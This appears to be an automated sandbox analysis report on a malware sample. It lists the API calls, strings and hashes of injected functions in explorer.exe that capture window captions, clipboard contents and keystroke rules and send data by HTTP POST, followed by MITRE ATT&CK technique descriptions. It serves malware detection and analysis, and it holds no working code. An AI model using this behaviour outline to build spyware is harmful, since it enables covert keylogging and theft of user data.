Opcode Fuzzy Hash: ce19153dfc0de67f722fde1044a41740961121862a62f74b0f8b675de824ae8f
Instruction Fuzzy Hash: 0241C670E80315BBEF11BB79FC0DE5B3FAEEB457557418858F90A86240DB759822CBA0

Function 027916B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.NTDLL(0279582C), ref: 027916C4
lstrlenW.KERNEL32 ref: 027916DB
lstrlenW.KERNEL32 ref: 027916F3
wsprintfW.USER32 ref: 02791743
GetForegroundWindow.USER32 ref: 0279174E
GetWindowTextW.USER32(00000000,02795850,00000800), ref: 02791767
GetClassNameW.USER32(00000000,02795850,00000800), ref: 02791774
lstrcmpW.KERNEL32(02795020,02795850), ref: 02791781
lstrcpyW.KERNEL32(02795020,02795850), ref: 0279178D
wsprintfW.USER32 ref: 027917AD
lstrcatW.KERNEL32 ref: 027917C6
RtlLeaveCriticalSection.NTDLL(0279582C), ref: 027917D3

Strings

%s%s%s, xrefs: 02791738
Clipboard -> , xrefs: 02791730
%s%s%s%s, xrefs: 027917A2
New Window Caption -> , xrefs: 0279179A

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
API String ID: 2651329914-3371406555
Opcode ID: dbdb499a965e773389ae33df831a58dd7f37f3a5fd1137fc383054abcf9e7b39
Instruction ID: ae1bc7bb129d4341e4f2c2231fdae48db2df3853fa1738b5a643179bcf544f45
Opcode Fuzzy Hash: dbdb499a965e773389ae33df831a58dd7f37f3a5fd1137fc383054abcf9e7b39
Instruction Fuzzy Hash: 0A21A834D80327BBEB226739FC89E2B3F59EB457557858464F40592111DA328C32CBB5

Function 027925F1 Relevance: 15.1, APIs: 10, Instructions: 51
threadprocessinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 02792603
GetCurrentThreadId.KERNEL32 ref: 0279260B
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0279261B
Thread32First.KERNEL32(00000000,0000001C), ref: 02792629
OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02792648
SuspendThread.KERNEL32(00000000), ref: 02792658
CloseHandle.KERNEL32(00000000), ref: 02792667
Thread32Next.KERNEL32(00000000,0000001C), ref: 02792677
CloseHandle.KERNEL32(00000000), ref: 02792682

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 1467098526-0
Opcode ID: 9dd48001afdd021a5b226fbae15ac98463856412ddb0154469d97b195c9530d8
Instruction ID: 2333a6322047e3626940466d96e369effab30efc63dc8096a6a1d9e3f4ee06ef
Opcode Fuzzy Hash: 9dd48001afdd021a5b226fbae15ac98463856412ddb0154469d97b195c9530d8
Instruction Fuzzy Hash: 57117031C45300EFDB01AF64B84CA6FBEB9EF44705F008899F94592540D734892A8BA6

Function 027920A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13

Part of subcall function 0279298A: lstrlen.KERNEL32(02794FE2,?,00000000,00000000,027920DD,74DE8A60,02794FE2,00000000), ref: 02792992
Part of subcall function 0279298A: MultiByteToWideChar.KERNEL32(00000000,00000000,02794FE2,00000001,00000000,00000000), ref: 027929A4

Part of subcall function 027924CC: RtlZeroMemory.NTDLL(?,00000018), ref: 027924DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 02792139
wsprintfW.USER32 ref: 02792272
wsprintfW.USER32 ref: 027922DD
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 027923A7

Strings

Content-Type: application/x-www-form-urlencoded, xrefs: 02792301
Accept: */*Referer: %S, xrefs: 02792268
Host: %s, xrefs: 027922D7
POST, xrefs: 02792223

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 1e468d6d721af67cb6c3c2bc5949acb1f1861c2efa4f23c5ca1e45f4c4f995c8
Instruction ID: bfa683d138390da3dc5d0a5a2a755f58c45cbcd17b72f221f7cc375a789ebf08
Opcode Fuzzy Hash: 1e468d6d721af67cb6c3c2bc5949acb1f1861c2efa4f23c5ca1e45f4c4f995c8
Instruction Fuzzy Hash: ADA17F71648340AFDB11EF69E888A2BBBE9EF89744F00482DF985D7252DB34D905CF52

Function 027912AE Relevance: 7.6, APIs: 5, Instructions: 93
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 027929BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,027912D9,00000000,00000000,?,00000001), ref: 027929C7

lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 027912DC

Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13

PathMatchSpecA.SHLWAPI(?,00000000), ref: 0279138A

Part of subcall function 02792841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,02791119,00000001), ref: 02792850
Part of subcall function 02792841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,02791119,00000001), ref: 02792855

RtlZeroMemory.NTDLL(00000000,00000104), ref: 02791316
RtlMoveMemory.NTDLL(00000000,?,?), ref: 02791332

Part of subcall function 02792569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0279136E), ref: 02792591
Part of subcall function 02792569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0279259A

RtlMoveMemory.NTDLL(00000000,?,?), ref: 0279135F

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
String ID:
API String ID: 2993730741-0
Opcode ID: 967c543d188fc783f00cf20c3f5d358a9ee89ce6e900ae3d8b0220e3c412bc40
Instruction ID: 26b07753e100b5717288a6b4b26bfb98bd8d9426b9e74e6c3c5dc2856003e79c
Opcode Fuzzy Hash: 967c543d188fc783f00cf20c3f5d358a9ee89ce6e900ae3d8b0220e3c412bc40
Instruction Fuzzy Hash: AA218570B04312AF8F05EE29A45897FB7EAAB84714B50096EFC55D3741DB34DC158A62

Function 02791581 Relevance: 7.6, APIs: 5, Instructions: 66
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalLock.KERNEL32(00000000), ref: 027915A9
lstrlenW.KERNEL32(00000000), ref: 027915C6
lstrcatW.KERNEL32(00000000,00000000), ref: 027915DC
lstrlenW.KERNEL32(00000000), ref: 02791600
GlobalUnlock.KERNEL32(00000000), ref: 0279161C

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Globallstrlen$LockUnlocklstrcat
String ID:
API String ID: 1114890469-0
Opcode ID: c8344c88e2e21bf98c58d5f195a296066c1fd933f0ac598c56faec63f1fa89ab
Instruction ID: 146f69cd0e49b004d41702b60f7598767b7e665e5c67a962d2ad58328ef02812
Opcode Fuzzy Hash: c8344c88e2e21bf98c58d5f195a296066c1fd933f0ac598c56faec63f1fa89ab
Instruction Fuzzy Hash: 69010832E403236B9E26767D785C67E62AFDFC621474A8425E80FE3201DF358C238651

Function 02791BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON

Download Yara Rule

APIs

RtlMoveMemory.NTDLL(?,?,?), ref: 02791BF4
LoadLibraryA.KERNEL32(?,02795848,00000000,00000000,74DF2EE0,00000000,027919B6,?,?,?,00000001,?,00000000), ref: 02791C1C
GetProcAddress.KERNEL32(00000000,-00000002), ref: 02791C49
LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02791C9A

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
String ID:
API String ID: 3827878703-0
Opcode ID: 3075c68f21945d0306550bc6aad57ea4919d2d7c6794133134ed0d25785dd073
Instruction ID: 7718d82b2ec23f2db7cc7233b65eb5bba2fd4be97e1c02008eed409b31425065
Opcode Fuzzy Hash: 3075c68f21945d0306550bc6aad57ea4919d2d7c6794133134ed0d25785dd073
Instruction Fuzzy Hash: C9318371701717AFCF18CF29E884B66B7A8BF06319F44456DE84AC7640D731E865DBA0

Function 0279182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0279582C), ref: 02791839
lstrlenW.KERNEL32 ref: 02791845
RtlLeaveCriticalSection.NTDLL(0279582C), ref: 027918A9
Sleep.KERNEL32(00007530), ref: 027918B4

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeaveSleeplstrlen
String ID:
API String ID: 2134730579-0
Opcode ID: 0f32c275c168388774a189bf71c3ab67b365d99259893df277342b34f01d5db8
Instruction ID: 278a77e1164468569d8dd3a6d14ba7c09aae46a0e032588c195a5ff3c78a54cc
Opcode Fuzzy Hash: 0f32c275c168388774a189bf71c3ab67b365d99259893df277342b34f01d5db8
Instruction Fuzzy Hash: DE01A230D50310BBDB16B7B9FC5D92E3AAAEB417503408428E80697241EA308C23DFA2

Function 027926C9 Relevance: 6.0, APIs: 4, Instructions: 39COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,027911DD), ref: 027926DB
IsWow64Process.KERNEL32(000000FF,?), ref: 027926ED
IsWow64Process.KERNEL32(00000000,?), ref: 02792700
CloseHandle.KERNEL32(00000000), ref: 02792716

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Process$Wow64$CloseHandleOpen
String ID:
API String ID: 331459951-0
Opcode ID: 51548a96f800b365aa013d19a3a9664be6dc73845988b0b14f2a1ec51b91ebbb
Instruction ID: 8305e0385eaa2dcc2889af84d5cd0544286184acccc3173b4f681fd4ea1e3f09
Opcode Fuzzy Hash: 51548a96f800b365aa013d19a3a9664be6dc73845988b0b14f2a1ec51b91ebbb
Instruction Fuzzy Hash: 00F09075D42319FF9B10DFA4AD888BFB7BDEE05255B1042AAEA05A3241D7314E0196A0

Function 027917DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02792A09: GetProcessHeap.KERNEL32(00000008,0000A000,027910BF), ref: 02792A0C
Part of subcall function 02792A09: RtlAllocateHeap.NTDLL(00000000), ref: 02792A13

GetLocalTime.KERNEL32(?,00000000), ref: 027917F3
wsprintfW.USER32 ref: 0279181D

Strings

[%02d.%02d.%d %02d:%02d:%02d], xrefs: 02791817

Memory Dump Source

Source File: 0000001B.00000002.2893317519.0000000002791000.00000040.80000000.00040000.00000000.sdmp, Offset: 02791000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2791000_explorer.jbxd

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID: [%02d.%02d.%d %02d:%02d:%02d]
API String ID: 377395780-613334611
Opcode ID: f96e4a1b1f37344a0cc7ff50dcf95f6662d9e48fa8d5c998eadf483e5bddbf62
Instruction ID: 7fe0e0117a331ac895530d53956c97a847fb6efa1d92538cf193d6948c05f606
Opcode Fuzzy Hash: f96e4a1b1f37344a0cc7ff50dcf95f6662d9e48fa8d5c998eadf483e5bddbf62
Instruction Fuzzy Hash: 2AF03772D40128BA9B1467DDAC058FFB3FCEB0D701B00058AFE55D1140E5785950D7B5

Analysis Process: explorer.exePID: 6100, Parent PID: 2580COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0014370C Relevance: 1.6, APIs: 1, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 0014378C

Memory Dump Source

Source File: 0000001C.00000002.2893008511.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_141000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction ID: cd77c0423d845ba0c6dfe39b12f03788303bf9194c0ff9b13a7dd12c67190a05
Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
Instruction Fuzzy Hash: E611C8746019094FFB5CFB78989D37537E1F754312F544029E865C72B2DF398A818700

Function 001434C4 Relevance: 10.7, APIs: 7, Instructions: 195
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00141BF8: OpenFileMappingA.KERNEL32 ref: 00141C0F
Part of subcall function 00141BF8: MapViewOfFile.KERNELBASE ref: 00141C2E

CreateToolhelp32Snapshot.KERNEL32 ref: 001435B7
Process32First.KERNEL32 ref: 001435DA
CharLowerA.USER32 ref: 001435EE
Process32Next.KERNEL32 ref: 001436CD
CloseHandle.KERNELBASE ref: 001436DE
SysFreeMap.PGOCR ref: 001436F7
SleepEx.KERNELBASE ref: 00143701

Memory Dump Source

Source File: 0000001C.00000002.2893008511.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_141000_explorer.jbxd

Similarity

API ID: FileProcess32$CharCloseCreateFirstFreeHandleLowerMappingNextOpenSleepSnapshotToolhelp32View
String ID:
API String ID: 2386764625-0
Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction ID: 124acde2ded130d6ec2cd99066f89f2fed6d7d0fb9f75a883a94ce77bbbe54fb
Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
Instruction Fuzzy Hash: 3051BB30208A095FDB19FF28D8996AA73E2FBA4310F444619E45BC72B1DF38DA458B81

Function 0014B4A8 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 0014B5A7
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0014B651
VirtualProtect.KERNELBASE ref: 0014B66F

Memory Dump Source

Source File: 0000001C.00000002.2893008511.000000000014A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0014A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_14a000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction ID: a3019437ddd2afdf30cc8f6b63055c4eff59b6a7e4ed697b20ca4ee5e3b903b7
Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
Instruction Fuzzy Hash: 7A518C3275C91D4BCB28AB7C9CD43F4F7D1F759325B180A3AC49ACB2A5E758C8468381

Function 00141BF8 Relevance: 3.0, APIs: 2, Instructions: 40
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingA.KERNEL32 ref: 00141C0F
MapViewOfFile.KERNELBASE ref: 00141C2E

Memory Dump Source

Source File: 0000001C.00000002.2893008511.0000000000141000.00000040.80000000.00040000.00000000.sdmp, Offset: 00141000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_141000_explorer.jbxd

Similarity

API ID: File$MappingOpenView
String ID:
API String ID: 3439327939-0
Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction ID: f2945bcfd8831df92672e8549c06640a78e8b090393f57e1a130ce6ab3c17ea8
Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
Instruction Fuzzy Hash: 21F01234314F4D4FAB45EF7C9CDC135B7E1EBA8202744857A985AC6165EF34C8858715

Analysis Process: icgfugfPID: 5844, Parent PID: 1044COMMON

Executed Functions

Function 00BB0C20 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

tP^q, xrefs: 00BB0CE7

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID: tP^q
API String ID: 0-2862610199
Opcode ID: 808aab806e2d3238573fa7cbee5fadde5f5ced163cfb11f8ae766479236451ce
Instruction ID: a36fee7086cd54b00a201de1711c5f9e03af9e1b7af11960d9a29767364435b2
Opcode Fuzzy Hash: 808aab806e2d3238573fa7cbee5fadde5f5ced163cfb11f8ae766479236451ce
Instruction Fuzzy Hash: 52315A753102108FCB49AB78D45886D7BE2EF8A71632105F9E94ACF3B6DA75DC42CB81

Function 00BB0D58 Relevance: 1.3, Strings: 1, Instructions: 30COMMON

Download Yara Rule

Strings

8bq, xrefs: 00BB0D75

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: c5da4b8876ed7cc296243f0c7f2339ef4a40b3b186b4d9f20dce695c3166a4dd
Instruction ID: 82ffc5c391fbadcdc7629c4aa129a0ab08c5d14e055465877ad88b9f7e054bbf
Opcode Fuzzy Hash: c5da4b8876ed7cc296243f0c7f2339ef4a40b3b186b4d9f20dce695c3166a4dd
Instruction Fuzzy Hash: B0F0E2752016508FC702E7B8A451AF9BBE0EF8931970481AAE1498B3B6CE684C07CB81

Function 00BB0D68 Relevance: 1.3, Strings: 1, Instructions: 24COMMON

Download Yara Rule

Strings

8bq, xrefs: 00BB0D75

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID: 8bq
API String ID: 0-187764589
Opcode ID: 54b1af1cc4bf03e7c0283aec39780abd725890ca473d48d8d6e3ae771497de4d
Instruction ID: 53082d652b3084fff1145afc56ad3a27318627bc105bb3434ed93e604075f1fa
Opcode Fuzzy Hash: 54b1af1cc4bf03e7c0283aec39780abd725890ca473d48d8d6e3ae771497de4d
Instruction Fuzzy Hash: 93E09274200610CFC601F7FDE400A6AB7D5EF8D309B008469E1098B3A9CE74AC018BC1

Function 00BB06E0 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15c47406966c17b25aa7459c1c73b45adbf0421ed6ea5f431e9874a870145a0
Instruction ID: 8cc28c2c3041a6978bebabcca4a207da8afa2f3ae33a33fd71345369392e18aa
Opcode Fuzzy Hash: a15c47406966c17b25aa7459c1c73b45adbf0421ed6ea5f431e9874a870145a0
Instruction Fuzzy Hash: D851D130A002049FD705EBB8C8586AEBBF2FF89305F1584AAD445DB351EF759D46C782

Function 00BB0DB7 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d7c6c01179eae3164afc8db0706a8a222fdd750759f4572d159da798fcdc635
Instruction ID: 0cbecb1f6fd50a9758dc0d31aca946832444dd5a5971f9fe21510a2e7da6e928
Opcode Fuzzy Hash: 6d7c6c01179eae3164afc8db0706a8a222fdd750759f4572d159da798fcdc635
Instruction Fuzzy Hash: C711C079200640DFCB02ABB4F4899B97FB1FF4922971582E9E8088B373CB65D806DB00

Function 00BB0848 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 929276408d9f5cdc85d0b473e1918dab129ef73a2c90607853311df8cf908d96
Instruction ID: 8e2badca43a1ae4861c41ee024f09ff8b1e00b4eb9d8385b098b4aac310ce00e
Opcode Fuzzy Hash: 929276408d9f5cdc85d0b473e1918dab129ef73a2c90607853311df8cf908d96
Instruction Fuzzy Hash: F481D031A00204DFDB05FBB8D8446AEB7E2FF88315F10896AE4099B365DF759D46CB81

Function 00BB092D Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6eb517c25d738c9fdb58431f27f098e43274c8cf283c7dd71456366b2b834e2
Instruction ID: cc02e4657d3da0f0dcaaba3c09949384278b0a95d51cd0beef376c48f15aa9c6
Opcode Fuzzy Hash: c6eb517c25d738c9fdb58431f27f098e43274c8cf283c7dd71456366b2b834e2
Instruction Fuzzy Hash: 13216D30B002058FEB14BBB8C5583ADB3E2FF88719F118469D449D7355DF799C468786

Function 00BB0D22 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001D.00000002.2340689462.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_bb0000_icgfugf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7cb8211881adf4871dc90abda3bd0f0f0690262a6d3656b688af8c53160aa3
Instruction ID: 985b4949a36467bb202ea24f6fa75b3593379c27ddf223b3c7d4047b02a1681e
Opcode Fuzzy Hash: 5b7cb8211881adf4871dc90abda3bd0f0f0690262a6d3656b688af8c53160aa3
Instruction Fuzzy Hash: 54E0C234248280CFC3025B70E0188683F71DF4E23031641E6D8848B733C6298892CB00

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

